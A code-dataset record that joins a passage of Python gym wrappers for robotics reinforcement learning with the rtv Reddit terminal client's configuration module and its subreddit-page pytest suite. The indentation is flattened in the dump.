n_action_bins = self.DEFAULT_BINS
for low, high in zip(env.action_space.low, env.action_space.high):
self._disc_to_cont.append(
bin_spacing.get_bin_array(low, high, n_action_bins)
)
temp = [n_action_bins for _ in self._disc_to_cont]
self.action_space = gym.spaces.MultiDiscrete(temp)
self.action_space.seed(env.action_space.np_random.randint(0, 2 ** 32 - 1))
def action(self, action):
assert len(action) == len(self._disc_to_cont)
return np.array(
[m[a] for a, m in zip(action, self._disc_to_cont)], dtype=np.float32
)
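# Hypothetical usage: DiscretizeActionWrapper(env, n_action_bins=11, bin_spacing=BinSpacing.EXPONENTIAL)
# turns a continuous Box action space into a MultiDiscrete one with 11 bins per action dimension.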
class RewardNameWrapper(gym.Wrapper):
""" Sets the default reward name on the environment """
def __init__(self, env):
super().__init__(env)
unwrapped = self.env.unwrapped
if not hasattr(unwrapped, "reward_names"):
self.env.unwrapped.reward_names = ["env"]
def step(self, action):
return self.env.step(action)
def reset(self, **kwargs):
return self.env.reset(**kwargs)
class ClipObservationWrapper(gym.ObservationWrapper):
"""
Clips observations into a fixed range.
"""
def __init__(self, env=None, clip=100.0):
super().__init__(env)
self._clip = clip
def observation(self, observation):
clipped_observation = OrderedDict()
for key in observation:
clipped_observation[key] = np.clip(
observation[key], -self._clip, self._clip
)
return clipped_observation
def compute_relative_goals(self, *args, **kwargs):
self.env.compute_relative_goals(*args, **kwargs)
def compute_goal_reward(self, *args, **kwargs):
return self.env.compute_goal_reward(*args, **kwargs)
class ClipRewardWrapper(gym.RewardWrapper):
"""
Clips reward values into a fixed range.
"""
def __init__(self, env=None, clip=100.0):
super().__init__(env)
self._clip = clip
def reward(self, reward):
clipped_reward = np.clip(reward, -self._clip, self._clip)
return clipped_reward
def compute_relative_goals(self, *args, **kwargs):
self.env.compute_relative_goals(*args, **kwargs)
def compute_goal_reward(self, *args, **kwargs):
return self.env.compute_goal_reward(*args, **kwargs)
class ClipActionWrapper(gym.ActionWrapper):
""" Clips action values into a normalized space between -1 and 1"""
def action(self, action):
return np.clip(a=action, a_min=-1.0, a_max=1.0)
class IncrementalExpAvg(object):
""" A generic exponential moving average filter. """
def __init__(self, alpha, intial_value=None):
self._value = 0
self._t = 0
self._alpha = alpha
if intial_value is not None:
self.update(intial_value)
def update(self, observation):
self._value = self._value * self._alpha + (1 - self._alpha) * observation
self._t += 1
def get(self):
if self._value is None:
return None
else:
return self._value / (1 - self._alpha ** self._t)
class PreviousActionObservationWrapper(gym.Wrapper):
"""
Wrapper that annotates observations with a cached previous action.
"""
def __init__(self, env=None):
super().__init__(env)
env.observation_space.spaces["previous_action"] = deepcopy(env.action_space)
def reset(self, *args, **kwargs):
self.previous_action = np.zeros(self.env.action_space.shape)
return self.observation(self.env.reset(*args, **kwargs))
def observation(self, observation):
observation["previous_action"] = self.previous_action.copy()
return observation
def step(self, action):
self.previous_action = action.copy()
ob, rew, done, info = self.env.step(action)
return self.observation(ob), rew, done, info
def compute_relative_goals(self, *args, **kwargs):
self.env.compute_relative_goals(*args, **kwargs)
def compute_goal_reward(self, *args, **kwargs):
return self.env.compute_goal_reward(*args, **kwargs)
class SmoothActionWrapper(gym.Wrapper):
"""
Applies smoothing to the current action using an Exponential Moving Average filter.
"""
def __init__(self, env, alpha=0.0):
super().__init__(env)
self._alpha = alpha
delta = OrderedDict([("action_ema", self.env.action_space.shape)])
self.observation_space = update_obs_space(self.env, delta)
def reset(self, *args, **kwargs):
obs = self.env.reset(*args, **kwargs)
sim = self.unwrapped.sim
adjusted_alpha = np.power(
self._alpha, (sim.model.opt.timestep * sim.nsubsteps) / 0.08
)
self._ema = IncrementalExpAvg(alpha=adjusted_alpha)
obs["action_ema"] = np.zeros(self.env.action_space.shape)
return obs
def step(self, action):
self._ema.update(action)
action = self._ema.get()
obs, rew, done, info = self.env.step(action)
obs["action_ema"] = action
return obs, rew, done, info
class RelativeGoalWrapper(gym.ObservationWrapper):
"""
Wrapper that computes the 'relative goal' and 'achieved goal' observations for
environments.
"""
def __init__(self, env, obs_prefix=""):
# Prefix to map goal observation to state observation. This is a hack to
# handle inconsistent naming convention for cube environment observations
# e.g. goal_pos goal observation maps to cube_pos state observation.
self.obs_prefix = obs_prefix
super().__init__(env)
self.goal_obs_names = []
delta = OrderedDict()
for name, space in self.env.observation_space.spaces.items():
if name.startswith("goal_"):
delta[f"achieved_{name}"] = space.shape
delta[f"relative_{name}"] = space.shape
delta[f"noisy_achieved_{name}"] = space.shape
delta[f"noisy_relative_{name}"] = space.shape
obs_name = name[len("goal_"):]
assert (
f"{self.obs_prefix}{obs_name}" in self.env.observation_space.spaces
), (
f"Found {name} but not {self.obs_prefix}{obs_name} in observation space. "
f"RelativeGoalWrapper won't work. Available observation space: "
f"{sorted(self.env.observation_space.spaces.keys())}"
)
self.goal_obs_names.append(obs_name)
self.observation_space = update_obs_space(self.env, delta)
def observation(self, observation):
""" Calculate 'relative goal' and 'achieved goal' """
current_state = {
f"{self.obs_prefix}{n}": observation[f"{self.obs_prefix}{n}"]
for n in self.goal_obs_names
}
noisy_goal_state = {
f"{self.obs_prefix}{n}": observation[f"noisy_{self.obs_prefix}{n}"]
for n in self.goal_obs_names
}
relative_goal = self.env.unwrapped.goal_generation.relative_goal(
self.env.unwrapped._goal, current_state
)
noisy_relative_goal = self.env.unwrapped.goal_generation.relative_goal(
self.env.unwrapped._goal, noisy_goal_state
)
for name in self.goal_obs_names:
obs_name = f"{self.obs_prefix}{name}"
observation[f"achieved_goal_{name}"] = observation[obs_name].copy()
observation[f"relative_goal_{name}"] = relative_goal[obs_name]
observation[f"noisy_achieved_goal_{name}"] = observation[
f"noisy_{obs_name}"
].copy()
observation[f"noisy_relative_goal_{name}"] = noisy_relative_goal[obs_name]
return observation
class UnifiedGoalObservationWrapper(gym.ObservationWrapper):
"""Concatenates the pieces of every goal type"""
def __init__(
self, env, goal_keys=["relative_goal", "achieved_goal", "goal"], goal_parts=[],
):
super().__init__(env)
self.delta = OrderedDict()
for goal_key in goal_keys:
goal_len = sum(
[
self.observation_space.spaces[key].shape[0]
for key in self.observation_space.spaces.keys()
if key.startswith(goal_key)
]
)
self.delta[goal_key] = (goal_len,)
if any(
[
key.startswith("noisy_" + goal_key + "_")
for key in self.observation_space.spaces.keys()
]
):
self.delta["noisy_" + goal_key] = (goal_len,)
self.goal_parts = goal_parts
self.observation_space = update_obs_space(self.env, self.delta)
def observation(self, observation):
new_obs = OrderedDict()
for key, value in observation.items():
new_obs[key] = value
        # It's a bit hacky to hard-code the observation keys here, but we have to do it
        # for now to keep old policies backward compatible by keeping the observation
        # order the same.
for goal_key in self.delta.keys():
goal_parts = [goal_key + "_" + part for part in self.goal_parts]
goal = np.concatenate(
[observation[key] for key in goal_parts if key in observation]
)
new_obs[goal_key] = goal
return new_obs
class SummedRewardsWrapper(gym.RewardWrapper):
"""
Ensures that reward is a scalar.
"""
def reward(self, reward):
return np.sum([reward])
``` |
{
"source": "0xflotus/rtv",
"score": 2
} |
#### File: rtv/rtv/config.py
```python
from __future__ import unicode_literals
import os
import codecs
import shutil
import argparse
from functools import partial
import six
from six.moves import configparser
from . import docs, __version__
from .objects import KeyMap
PACKAGE = os.path.dirname(__file__)
HOME = os.path.expanduser('~')
TEMPLATES = os.path.join(PACKAGE, 'templates')
DEFAULT_CONFIG = os.path.join(TEMPLATES, 'rtv.cfg')
DEFAULT_MAILCAP = os.path.join(TEMPLATES, 'mailcap')
DEFAULT_THEMES = os.path.join(PACKAGE, 'themes')
XDG_CONFIG_HOME = os.getenv('XDG_CONFIG_HOME', os.path.join(HOME, '.config'))
XDG_DATA_HOME = os.getenv('XDG_DATA_HOME', os.path.join(HOME, '.local', 'share'))
CONFIG = os.path.join(XDG_CONFIG_HOME, 'rtv', 'rtv.cfg')
MAILCAP = os.path.join(HOME, '.mailcap')
TOKEN = os.path.join(XDG_DATA_HOME, 'rtv', 'refresh-token')
HISTORY = os.path.join(XDG_DATA_HOME, 'rtv', 'history.log')
THEMES = os.path.join(XDG_CONFIG_HOME, 'rtv', 'themes')
def build_parser():
parser = argparse.ArgumentParser(
prog='rtv', description=docs.SUMMARY,
epilog=docs.CONTROLS,
usage=docs.USAGE,
formatter_class=argparse.RawDescriptionHelpFormatter)
parser.add_argument(
'link', metavar='URL', nargs='?',
help='[optional] Full URL of a submission to open')
parser.add_argument(
'-s', dest='subreddit',
help='Name of the subreddit that will be loaded on start')
parser.add_argument(
'-l', dest='link_deprecated',
help=argparse.SUPPRESS) # Deprecated, use the positional arg instead
parser.add_argument(
'--log', metavar='FILE', action='store',
help='Log HTTP requests to the given file')
parser.add_argument(
'--config', metavar='FILE', action='store',
help='Load configuration settings from the given file')
parser.add_argument(
'--ascii', action='store_const', const=True,
help='Enable ascii-only mode')
parser.add_argument(
'--monochrome', action='store_const', const=True,
help='Disable color')
parser.add_argument(
'--theme', metavar='FILE', action='store',
help='Color theme to use, see --list-themes for valid options')
parser.add_argument(
'--list-themes', metavar='FILE', action='store_const', const=True,
help='List all of the available color themes')
parser.add_argument(
'--non-persistent', dest='persistent', action='store_const', const=False,
help='Forget the authenticated user when the program exits')
parser.add_argument(
'--no-autologin', dest='autologin', action='store_const', const=False,
help='Do not authenticate automatically on startup')
parser.add_argument(
'--clear-auth', dest='clear_auth', action='store_const', const=True,
help='Remove any saved user data before launching')
parser.add_argument(
'--copy-config', dest='copy_config', action='store_const', const=True,
help='Copy the default configuration to {HOME}/.config/rtv/rtv.cfg')
parser.add_argument(
'--copy-mailcap', dest='copy_mailcap', action='store_const', const=True,
help='Copy an example mailcap configuration to {HOME}/.mailcap')
parser.add_argument(
'--enable-media', dest='enable_media', action='store_const', const=True,
help='Open external links using programs defined in the mailcap config')
parser.add_argument(
'-V', '--version', action='version', version='rtv ' + __version__)
parser.add_argument(
'--no-flash', dest='flash', action='store_const', const=False,
help='Disable screen flashing')
return parser
def copy_default_mailcap(filename=MAILCAP):
"""
Copy the example mailcap configuration to the specified file.
"""
return _copy_settings_file(DEFAULT_MAILCAP, filename, 'mailcap')
def copy_default_config(filename=CONFIG):
"""
Copy the default rtv user configuration to the specified file.
"""
return _copy_settings_file(DEFAULT_CONFIG, filename, 'config')
def _copy_settings_file(source, destination, name):
"""
Copy a file from the repo to the user's home directory.
"""
if os.path.exists(destination):
try:
ch = six.moves.input(
                'File %s already exists, overwrite? (y/[n]): ' % destination)
if ch not in ('Y', 'y'):
return
except KeyboardInterrupt:
return
filepath = os.path.dirname(destination)
if not os.path.exists(filepath):
os.makedirs(filepath)
print('Copying default %s to %s' % (name, destination))
shutil.copy(source, destination)
os.chmod(destination, 0o664)
class OrderedSet(object):
"""
A simple implementation of an ordered set. A set is used to check
for membership, and a list is used to maintain ordering.
"""
def __init__(self, elements=None):
elements = elements or []
self._set = set(elements)
self._list = elements
def __contains__(self, item):
return item in self._set
def __len__(self):
return len(self._list)
def __getitem__(self, item):
return self._list[item]
def add(self, item):
self._set.add(item)
self._list.append(item)
class Config(object):
"""
This class manages the loading and saving of configs and other files.
"""
def __init__(self, history_file=HISTORY, token_file=TOKEN, **kwargs):
self.history_file = history_file
self.token_file = token_file
self.config = kwargs
default, bindings = self.get_file(DEFAULT_CONFIG)
self.default = default
self.keymap = KeyMap(bindings)
# `refresh_token` and `history` are saved/loaded at separate locations,
# so they are treated differently from the rest of the config options.
self.refresh_token = None
self.history = OrderedSet()
def __getitem__(self, item):
if item in self.config:
return self.config[item]
else:
return self.default.get(item, None)
def __setitem__(self, key, value):
self.config[key] = value
def __delitem__(self, key):
self.config.pop(key, None)
def update(self, **kwargs):
self.config.update(kwargs)
def load_refresh_token(self):
if os.path.exists(self.token_file):
with open(self.token_file) as fp:
self.refresh_token = fp.read().strip()
else:
self.refresh_token = None
def save_refresh_token(self):
self._ensure_filepath(self.token_file)
with open(self.token_file, 'w+') as fp:
fp.write(self.refresh_token)
def delete_refresh_token(self):
if os.path.exists(self.token_file):
os.remove(self.token_file)
self.refresh_token = None
def load_history(self):
if os.path.exists(self.history_file):
with codecs.open(self.history_file, encoding='utf-8') as fp:
self.history = OrderedSet([line.strip() for line in fp])
else:
self.history = OrderedSet()
def save_history(self):
self._ensure_filepath(self.history_file)
with codecs.open(self.history_file, 'w+', encoding='utf-8') as fp:
fp.writelines('\n'.join(self.history[-self['history_size']:]))
def delete_history(self):
if os.path.exists(self.history_file):
os.remove(self.history_file)
self.history = OrderedSet()
@staticmethod
def get_args():
"""
Load settings from the command line.
"""
parser = build_parser()
args = vars(parser.parse_args())
# Overwrite the deprecated "-l" option into the link variable
if args['link_deprecated'] and args['link'] is None:
args['link'] = args['link_deprecated']
args.pop('link_deprecated', None)
# Filter out argument values that weren't supplied
return {key: val for key, val in args.items() if val is not None}
@classmethod
def get_file(cls, filename=None):
"""
Load settings from an rtv configuration file.
"""
if filename is None:
filename = CONFIG
config = configparser.ConfigParser()
if os.path.exists(filename):
with codecs.open(filename, encoding='utf-8') as fp:
config.readfp(fp)
return cls._parse_rtv_file(config)
@staticmethod
def _parse_rtv_file(config):
rtv = {}
if config.has_section('rtv'):
rtv = dict(config.items('rtv'))
params = {
'ascii': partial(config.getboolean, 'rtv'),
'monochrome': partial(config.getboolean, 'rtv'),
'persistent': partial(config.getboolean, 'rtv'),
'autologin': partial(config.getboolean, 'rtv'),
'clear_auth': partial(config.getboolean, 'rtv'),
'enable_media': partial(config.getboolean, 'rtv'),
'history_size': partial(config.getint, 'rtv'),
'oauth_redirect_port': partial(config.getint, 'rtv'),
'oauth_scope': lambda x: rtv[x].split(','),
'max_comment_cols': partial(config.getint, 'rtv'),
'hide_username': partial(config.getboolean, 'rtv'),
'flash': partial(config.getboolean, 'rtv')
}
for key, func in params.items():
if key in rtv:
rtv[key] = func(key)
bindings = {}
if config.has_section('bindings'):
bindings = dict(config.items('bindings'))
for name, keys in bindings.items():
bindings[name] = [key.strip() for key in keys.split(',')]
return rtv, bindings
@staticmethod
def _ensure_filepath(filename):
"""
Ensure that the directory exists before trying to write to the file.
"""
filepath = os.path.dirname(filename)
if not os.path.exists(filepath):
os.makedirs(filepath)
```
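A minimal sketch of wiring these pieces together. This mirrors, rather than reproduces, rtv's actual startup sequence, and the precedence of command-line values over file values is an assumption:
```python
args = Config.get_args()                                   # settings from the command line
settings, bindings = Config.get_file(args.get('config'))   # settings from rtv.cfg (if present)
# `bindings` feeds a KeyMap elsewhere; ignored in this sketch.

config = Config(**settings)
config.update(**args)          # let command-line flags override the config file
config.load_refresh_token()    # restores the saved OAuth token, if any
config.load_history()          # restores the visited-link history
```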
#### File: rtv/tests/test_subreddit.py
```python
from __future__ import unicode_literals
import curses
import six
import pytest
from rtv import __version__
from rtv.subreddit_page import SubredditPage
from rtv.packages.praw.errors import NotFound, HTTPException
from requests.exceptions import ReadTimeout
try:
from unittest import mock
except ImportError:
import mock
def test_subreddit_page_construct(reddit, terminal, config, oauth):
window = terminal.stdscr.subwin
with terminal.loader():
page = SubredditPage(reddit, terminal, config, oauth, '/r/python')
assert terminal.loader.exception is None
page.draw()
# Title
title = '/r/python'.encode('utf-8')
window.addstr.assert_any_call(0, 0, title)
# Banner
menu = '[1]hot [2]top [3]rising [4]new [5]controversial [6]gilded'.encode('utf-8')
window.addstr.assert_any_call(0, 0, menu)
# Submission
text = page.content.get(0)['split_title'][0].encode('utf-8')
window.subwin.addstr.assert_any_call(0, 1, text, 2097152)
# Cursor should have been drawn
window.subwin.addch.assert_any_call(0, 0, ' ', curses.A_REVERSE)
# Reload with a smaller terminal window
terminal.stdscr.ncols = 20
terminal.stdscr.nlines = 10
with terminal.loader():
page = SubredditPage(reddit, terminal, config, oauth, '/r/python')
assert terminal.loader.exception is None
page.draw()
def test_subreddit_refresh(subreddit_page, terminal):
# Refresh the page with default values
subreddit_page.controller.trigger('r')
assert subreddit_page.content.order is None
assert subreddit_page.content.name == '/r/python'
assert terminal.loader.exception is None
# Refresh with the order in the name
subreddit_page.refresh_content(order='ignore', name='/r/front/hot')
assert subreddit_page.content.order == 'hot'
assert subreddit_page.content.name == '/r/front'
assert terminal.loader.exception is None
def test_subreddit_reload_page(subreddit_page, terminal, reddit):
cache = reddit.handler.cache
assert len(cache) == 1
# A plain refresh_content() will use whatever is in the praw cache
# instead of making a new request to reddit
list(cache.values())[0].status_code = 503
subreddit_page.refresh_content()
assert isinstance(terminal.loader.exception, HTTPException)
cache = reddit.handler.cache
assert len(cache) == 1
# But if we manually trigger a page refresh, it should clear the cache
# and reload the page instead of returning the cached 503 response
list(cache.values())[0].status_code = 503
subreddit_page.controller.trigger('r')
assert terminal.loader.exception is None
def test_subreddit_title(subreddit_page, terminal, capsys):
subreddit_page.content.name = 'hello ❤'
with mock.patch.dict('os.environ', {'DISPLAY': ':1'}):
terminal.config['ascii'] = True
subreddit_page.draw()
out, _ = capsys.readouterr()
assert isinstance(out, six.text_type)
assert out == '\x1b]2;hello ? - rtv {}\x07'.format(__version__)
terminal.config['ascii'] = False
subreddit_page.draw()
out, _ = capsys.readouterr()
assert isinstance(out, six.text_type)
assert out == '\x1b]2;hello ❤ - rtv {}\x07'.format(__version__)
with mock.patch.dict('os.environ', {'DISPLAY': ''}):
subreddit_page.draw()
out, _ = capsys.readouterr()
assert not out
with mock.patch.dict('os.environ', {'INSIDE_EMACS': '25.3.1,term:0.96'}):
subreddit_page.draw()
out, _ = capsys.readouterr()
assert not out
def test_subreddit_search(subreddit_page, terminal):
window = terminal.stdscr.subwin
# Search the current subreddit
with mock.patch.object(terminal, 'prompt_input'):
terminal.prompt_input.return_value = 'search term'
subreddit_page.controller.trigger('f')
assert subreddit_page.content.name == '/r/python'
assert terminal.prompt_input.called
assert not terminal.loader.exception
# The page title should display the query
subreddit_page.draw()
title = 'Searching /r/python: search term'.encode('utf-8')
window.addstr.assert_any_call(0, 0, title)
# Ordering the results should preserve the query
window.addstr.reset_mock()
subreddit_page.refresh_content(order='hot')
subreddit_page.refresh_content(order='top-all')
subreddit_page.refresh_content(order='new')
assert subreddit_page.content.name == '/r/python'
assert subreddit_page.content.query == 'search term'
assert not terminal.loader.exception
# Searching with an empty query shouldn't crash
with mock.patch.object(terminal, 'prompt_input'):
terminal.prompt_input.return_value = None
subreddit_page.controller.trigger('f')
assert not terminal.loader.exception
# Changing to a new subreddit should clear the query
window.addstr.reset_mock()
subreddit_page.refresh_content(name='/r/learnpython')
assert subreddit_page.content.query is None
def test_subreddit_prompt(subreddit_page, terminal):
# Prompt for a different subreddit
with mock.patch.object(terminal, 'prompt_input'):
terminal.prompt_input.return_value = 'front/top'
subreddit_page.controller.trigger('/')
assert subreddit_page.content.name == '/r/front'
assert subreddit_page.content.order == 'top'
assert not terminal.loader.exception
def test_subreddit_prompt_submission(subreddit_page, terminal):
prompts = [
'comments/571dw3',
'///comments/571dw3',
'/comments/571dw3',
'/r/pics/comments/571dw3/',
'https://www.reddit.com/r/pics/comments/571dw3/at_disneyland']
url = 'https://www.reddit.com/comments/571dw3'
for text in prompts:
with mock.patch.object(subreddit_page, 'open_submission'), \
mock.patch.object(terminal, 'prompt_input'):
terminal.prompt_input.return_value = text
subreddit_page.controller.trigger('/')
subreddit_page.open_submission.assert_called_with(url)
assert not terminal.loader.exception
def test_subreddit_prompt_submission_invalid(subreddit_page, terminal):
with mock.patch.object(terminal, 'prompt_input'):
terminal.prompt_input.return_value = 'comments/571dw3fakeid'
subreddit_page.controller.trigger('/')
assert isinstance(terminal.loader.exception, NotFound)
def test_subreddit_order(subreddit_page):
# /r/python doesn't always have rising submissions, so use a larger sub
subreddit_page.refresh_content(name='all')
subreddit_page.content.query = ''
subreddit_page.controller.trigger('1')
assert subreddit_page.content.order == 'hot'
subreddit_page.controller.trigger('3')
assert subreddit_page.content.order == 'rising'
subreddit_page.controller.trigger('4')
assert subreddit_page.content.order == 'new'
subreddit_page.controller.trigger('6')
assert subreddit_page.content.order == 'gilded'
subreddit_page.content.query = 'search text'
subreddit_page.controller.trigger('1')
assert subreddit_page.content.order == 'relevance'
subreddit_page.controller.trigger('4')
assert subreddit_page.content.order == 'new'
# Shouldn't be able to sort queries by gilded
subreddit_page.controller.trigger('6')
assert curses.flash.called
assert subreddit_page.content.order == 'new'
def test_subreddit_order_top(subreddit_page, terminal):
# Sort by top
with mock.patch.object(terminal, 'show_notification'):
# Invalid selection
terminal.show_notification.return_value = ord('x')
subreddit_page.controller.trigger('2')
terminal.show_notification.assert_called_with('Invalid option')
assert subreddit_page.content.order is None
# Valid selection - sort by week
terminal.show_notification.reset_mock()
terminal.show_notification.return_value = ord('3')
subreddit_page.controller.trigger('2')
assert subreddit_page.content.order == 'top-week'
def test_subreddit_order_controversial(subreddit_page, terminal):
# Sort by controversial
with mock.patch.object(terminal, 'show_notification'):
# Invalid selection
terminal.show_notification.return_value = ord('x')
subreddit_page.controller.trigger('5')
terminal.show_notification.assert_called_with('Invalid option')
assert subreddit_page.content.order is None
# Valid selection - sort by default
terminal.show_notification.reset_mock()
terminal.show_notification.return_value = ord('\n')
subreddit_page.controller.trigger('5')
assert subreddit_page.content.order == 'controversial'
def test_subreddit_order_search(subreddit_page, terminal):
# Search the current subreddit
with mock.patch.object(terminal, 'prompt_input'):
terminal.prompt_input.return_value = 'search term'
subreddit_page.controller.trigger('f')
assert subreddit_page.content.name == '/r/python'
assert terminal.prompt_input.called
assert not terminal.loader.exception
# Sort by relevance
subreddit_page.controller.trigger('1')
assert subreddit_page.content.order == 'relevance'
# Sort by top
with mock.patch.object(terminal, 'show_notification'):
terminal.show_notification.reset_mock()
terminal.show_notification.return_value = ord('6')
subreddit_page.controller.trigger('2')
assert subreddit_page.content.order == 'top-all'
# Sort by comments
with mock.patch.object(terminal, 'show_notification'):
terminal.show_notification.reset_mock()
terminal.show_notification.return_value = ord('6')
subreddit_page.controller.trigger('3')
assert subreddit_page.content.order == 'comments-all'
# Sort by new
subreddit_page.controller.trigger('4')
assert subreddit_page.content.order == 'new'
def test_subreddit_open(subreddit_page, terminal, config):
# Open the selected submission
data = subreddit_page.content.get(subreddit_page.nav.absolute_index)
with mock.patch('rtv.submission_page.SubmissionPage.loop') as loop, \
mock.patch.object(config.history, 'add'):
data['url_type'] = 'selfpost'
subreddit_page.controller.trigger('l')
assert not terminal.loader.exception
assert loop.called
config.history.add.assert_called_with(data['url_full'])
# Open the selected link externally
data = subreddit_page.content.get(subreddit_page.nav.absolute_index)
with mock.patch.object(terminal, 'open_link'), \
mock.patch.object(config.history, 'add'):
data['url_type'] = 'external'
subreddit_page.controller.trigger('o')
assert terminal.open_link.called
config.history.add.assert_called_with(data['url_full'])
# Open the selected link within rtv
data = subreddit_page.content.get(subreddit_page.nav.absolute_index)
with mock.patch.object(subreddit_page, 'open_submission'), \
mock.patch.object(config.history, 'add'):
data['url_type'] = 'selfpost'
subreddit_page.controller.trigger('o')
assert subreddit_page.open_submission.called
def test_subreddit_open_xpost(subreddit_page, config):
data = subreddit_page.content.get(subreddit_page.nav.absolute_index)
# Open an x-post subreddit, see /r/TinySubredditoftheDay for an example
with mock.patch.object(subreddit_page, 'refresh_content'):
data['url_type'] = 'x-post subreddit'
data['xpost_subreddit'] = 'goodbye'
subreddit_page.controller.trigger('o')
subreddit_page.refresh_content.assert_called_with(
name='goodbye', order='ignore')
# Open an x-post submission, see /r/bestof for an example
with mock.patch.object(subreddit_page, 'open_submission'):
data['url_type'] = 'x-post submission'
data['url_full'] = 'www.test.com'
subreddit_page.controller.trigger('o')
subreddit_page.open_submission.assert_called_with(url='www.test.com')
def test_subreddit_unauthenticated(subreddit_page, terminal):
# Unauthenticated commands
methods = [
'a', # Upvote
'z', # Downvote
'c', # Post
'e', # Edit
'd', # Delete
's', # Subscriptions
]
for ch in methods:
subreddit_page.controller.trigger(ch)
text = 'Not logged in'.encode('utf-8')
terminal.stdscr.subwin.addstr.assert_called_with(1, 1, text)
def test_subreddit_post(subreddit_page, terminal, reddit, refresh_token):
# Log in
subreddit_page.config.refresh_token = refresh_token
subreddit_page.oauth.authorize()
# Post a submission to an invalid subreddit
subreddit_page.refresh_content(name='front')
subreddit_page.controller.trigger('c')
text = "Can't post to /r/front".encode('utf-8')
terminal.stdscr.subwin.addstr.assert_called_with(1, 1, text)
# Post a submission with a title but with no body
subreddit_page.refresh_content(name='python')
with mock.patch.object(terminal, 'open_editor'):
terminal.open_editor.return_value.__enter__.return_value = 'title'
subreddit_page.controller.trigger('c')
text = 'Missing body'.encode('utf-8')
terminal.stdscr.subwin.addstr.assert_called_with(1, 1, text)
# Post a fake submission
url = 'https://www.reddit.com/r/Python/comments/2xmo63/'
submission = reddit.get_submission(url)
with mock.patch.object(terminal, 'open_editor'), \
mock.patch.object(reddit, 'submit'), \
mock.patch('rtv.page.Page.loop') as loop, \
mock.patch('time.sleep'):
terminal.open_editor.return_value.__enter__.return_value = 'test\ncont'
reddit.submit.return_value = submission
subreddit_page.controller.trigger('c')
assert reddit.submit.called
assert loop.called
def test_subreddit_open_subscriptions(subreddit_page, refresh_token):
# Log in
subreddit_page.config.refresh_token = refresh_token
subreddit_page.oauth.authorize()
# Open subscriptions
with mock.patch('rtv.page.Page.loop') as loop:
subreddit_page.controller.trigger('s')
assert loop.called
def test_subreddit_get_inbox_timeout(subreddit_page, refresh_token, terminal, vcr):
if vcr.record_mode == 'none':
pytest.skip('Unable to test ReadTimeout exceptions using a cassette')
# Log in
subreddit_page.config.refresh_token = refresh_token
subreddit_page.oauth.authorize()
subreddit_page.reddit.config.timeout = 0.00000001
subreddit_page.controller.trigger('i')
text = 'HTTP request timed out'.encode('utf-8')
terminal.stdscr.subwin.addstr.assert_called_with(1, 1, text)
assert isinstance(terminal.loader.exception, ReadTimeout)
def test_subreddit_open_multireddits(subreddit_page, refresh_token):
# Log in
subreddit_page.config.refresh_token = refresh_token
subreddit_page.oauth.authorize()
# Open multireddits
with mock.patch('rtv.page.Page.loop') as loop:
subreddit_page.controller.trigger('S')
assert loop.called
def test_subreddit_private_user_pages(subreddit_page, refresh_token):
# Log in
subreddit_page.config.refresh_token = refresh_token
subreddit_page.oauth.authorize()
subreddit_page.refresh_content(name='/u/me/saved')
subreddit_page.draw()
subreddit_page.refresh_content(name='/u/me/hidden')
subreddit_page.draw()
subreddit_page.refresh_content(name='/u/me/upvoted')
subreddit_page.draw()
subreddit_page.refresh_content(name='/u/me/downvoted')
subreddit_page.draw()
subreddit_page.refresh_content(name='/u/me/overview')
subreddit_page.draw()
subreddit_page.refresh_content(name='/u/me/submitted')
subreddit_page.draw()
subreddit_page.refresh_content(name='/u/me/comments')
subreddit_page.draw()
def test_subreddit_user_pages(subreddit_page, refresh_token):
# Log in
subreddit_page.config.refresh_token = refresh_token
subreddit_page.oauth.authorize()
# Pick a user that has a lot of recent comments, so we can make sure that
# SavedComment objects have all of the properties necessary to be drawn
# on the submission page.
# Should default to the overview page
subreddit_page.refresh_content(name='/u/spez')
subreddit_page.draw()
subreddit_page.refresh_content(name='/u/spez/overview')
subreddit_page.draw()
subreddit_page.refresh_content(name='/u/spez/submitted')
subreddit_page.draw()
subreddit_page.refresh_content(name='/u/spez/comments')
subreddit_page.draw()
def test_subreddit_draw_header(subreddit_page, refresh_token, terminal):
# /r/front alias should be renamed in the header
subreddit_page.refresh_content(name='/r/front')
subreddit_page.draw()
text = 'Front Page'.encode('utf-8')
terminal.stdscr.subwin.addstr.assert_any_call(0, 0, text)
subreddit_page.refresh_content(name='/r/front/new')
subreddit_page.draw()
text = 'Front Page'.encode('utf-8')
terminal.stdscr.subwin.addstr.assert_any_call(0, 0, text)
# Log in to check the user submissions page
subreddit_page.config.refresh_token = refresh_token
subreddit_page.oauth.authorize()
# /u/me alias should be renamed in the header
subreddit_page.refresh_content(name='/u/me')
subreddit_page.draw()
text = 'My Overview'.encode('utf-8')
terminal.stdscr.subwin.addstr.assert_any_call(0, 0, text)
subreddit_page.refresh_content(name='/u/me/new')
subreddit_page.draw()
text = 'My Overview'.encode('utf-8')
terminal.stdscr.subwin.addstr.assert_any_call(0, 0, text)
# /u/saved alias should be renamed in the header
subreddit_page.refresh_content(name='/u/me/saved')
subreddit_page.draw()
text = 'My Saved Content'.encode('utf-8')
terminal.stdscr.subwin.addstr.assert_any_call(0, 0, text)
# /u/upvoted alias should be renamed in the header
subreddit_page.refresh_content(name='/u/me/upvoted')
subreddit_page.draw()
text = 'My Upvoted Content'.encode('utf-8')
terminal.stdscr.subwin.addstr.assert_any_call(0, 0, text)
# /u/downvoted alias should be renamed in the header
subreddit_page.refresh_content(name='/u/me/downvoted')
subreddit_page.draw()
text = 'My Downvoted Content'.encode('utf-8')
terminal.stdscr.subwin.addstr.assert_any_call(0, 0, text)
# /u/hidden alias should be renamed in the header
subreddit_page.refresh_content(name='/u/me/hidden')
subreddit_page.draw()
text = 'My Hidden Content'.encode('utf-8')
terminal.stdscr.subwin.addstr.assert_any_call(0, 0, text)
def test_subreddit_frontpage_toggle(subreddit_page, terminal):
with mock.patch.object(terminal, 'prompt_input'):
terminal.prompt_input.return_value = 'aww'
subreddit_page.controller.trigger('/')
assert subreddit_page.content.name == '/r/aww'
subreddit_page.controller.trigger('p')
assert subreddit_page.content.name == '/r/front'
def test_subreddit_hide_submission(subreddit_page, refresh_token):
# Log in
subreddit_page.config.refresh_token = refresh_token
subreddit_page.oauth.authorize()
# The api won't return hidden posts in the submission listing, so the
# first post should always have hidden set to false
data = subreddit_page.get_selected_item()
assert data['hidden'] is False
# Hide the first submission by pressing the space key
subreddit_page.controller.trigger(0x20)
assert subreddit_page.term.loader.exception is None
data = subreddit_page.get_selected_item()
assert data['hidden'] is True
# Make sure that the status was actually updated on the server side
data['object'].refresh()
assert data['object'].hidden is True
# Now undo the hide by pressing space again
subreddit_page.controller.trigger(0x20)
assert subreddit_page.term.loader.exception is None
